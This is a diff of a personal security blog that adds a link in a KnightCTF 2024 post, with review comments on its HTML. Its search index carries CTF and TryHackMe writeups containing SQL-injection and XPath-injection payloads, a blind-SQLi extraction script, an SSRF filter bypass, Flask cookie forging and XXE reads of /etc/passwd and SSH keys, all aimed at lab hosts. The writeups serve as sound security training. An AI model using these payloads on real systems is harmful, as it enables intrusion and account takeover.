diff --git a/index.xml b/index.xml index 601c89c..f8b63a4 100644 --- a/index.xml +++ b/index.xml @@ -130,7 +130,10 @@ root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d <p>I got stuck here , will update when the ctf ends. :)</p> <hr> <h3 id="networking">Networking</h3> -<p>will add later</p> +<p>For the networking challs check out my teammates writeups on them &raquo;&gt;</p> +<h5 id="herehttpspl4int3xtgithubiopostsknight-ctf"><a class="link" href="https://pl4int3xt.github.io/posts/knight-ctf/" target="_blank" rel="noopener" + >here</a></h5> +<hr> diff --git a/p/knightctf_2024/index.html b/p/knightctf_2024/index.html index 617f335..4b4172c 100644 --- a/p/knightctf_2024/index.html +++ b/p/knightctf_2024/index.html @@ -353,7 +353,11 @@

Table of contents

  • Gain access 2
  • -
  • Networking
  • +
  • Networking +
      +
    1. +
    +
  • @@ -545,7 +549,10 @@

    Gain access 2

    I got stuck here , will update when the ctf ends. :)


    Networking

    -

    will add later

    +

    For the networking challs check out my teammates writeups on them »>

    +
    here
    +
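Review bot: the table-of-contents part of this hunk gains a nested numbered entry under "Networking" whose only text is "here", and the body now renders the sentence ending in a dangling "»>" with "here" on its own line below it, because the link was written as a heading rather than inline. Put the anchor inside the sentence instead (`For the networking challs check out my teammate's writeups on them <a ...>here</a>.`) so the ToC stays at "Networking" and the stray "»>" disappears; "teammates" should also be "teammate's" since the link points at a single teammate's blog.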
    diff --git a/post/index.xml b/post/index.xml index 18d985c..80a814c 100644 --- a/post/index.xml +++ b/post/index.xml @@ -130,7 +130,10 @@ root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d <p>I got stuck here , will update when the ctf ends. :)</p> <hr> <h3 id="networking">Networking</h3> -<p>will add later</p> +<p>For the networking challs check out my teammates writeups on them &raquo;&gt;</p> +<h5 id="herehttpspl4int3xtgithubiopostsknight-ctf"><a class="link" href="https://pl4int3xt.github.io/posts/knight-ctf/" target="_blank" rel="noopener" + >here</a></h5> +<hr>
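Review bot: `<h5 id="herehttpspl4int3xtgithubiopostsknight-ctf">` wrapping the anchor is a heading used as a link (the kind of output a `##### [here](https://pl4int3xt.github.io/posts/knight-ctf/)` line produces), which is what yields the URL-derived id and the extra ToC entry; the identical construct is in the index.xml hunk at the top of this patch, so both feeds need the same fix. Suggest one paragraph, `<p>For the networking challs check out my teammate's writeups on them <a class="link" href="https://pl4int3xt.github.io/posts/knight-ctf/" target="_blank" rel="noopener">here</a>.</p>`, dropping the `&raquo;&gt;` and the `<h5>`. Keep `rel="noopener"` on the `target="_blank"` link: it is the right setting for a cross-origin link, and `rel="noopener noreferrer"` is the option if the referrer should not be sent to the other site either.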
    diff --git a/search/index.json b/search/index.json index df650cc..10f857a 100644 --- a/search/index.json +++ b/search/index.json 
@@ -1 +1 @@ -[{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 2 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\n README This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\n Gain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 2 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 3 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 2 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. 
:)\n Networking will add later\n","date":"2024-01-20T22:14:59+03:00","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34;or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} 
","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\n How many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 4 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 5 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 1 2 3 4 5 6 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 7 8 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 4 index=main powershell ans : James.browne PowerShell logging is enabled on this device. 
How many events were logged for the malicious PowerShell execution? 1 2 3 4 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 7 8 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 10 1. What application do we use on Linux to monitor events such as command execution? auditd 2. 
What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 5 1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 def downloadManual(url): safeUrl = isSafeUrl(url) if 
safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 10 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 3 4 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n ","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? 
d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 11 12 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 9 10 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. 
websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 11 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 12 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 7 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 8 9 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 11 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. 
To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 6 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. 
In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 6 7 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\n web category\n Graph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 2 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . 
It was base64 encoded , so we decode it to get the flag\n X marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 2 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 2 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 2 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 2 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. 
For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 4 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 5 6 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\n forensics category\n SnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\n Sniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\n SnifferDog3 What version of Jenkins is running on 192.168.56.103? 
shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\n SnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n ","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n 1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 3 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n 2. 
chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 3 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 3 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. 
The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 3 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\n Idoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 12 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo 
\u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\n Blank This challenge tested knowledge is sql.\n1 2 3 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 5 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. 
so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 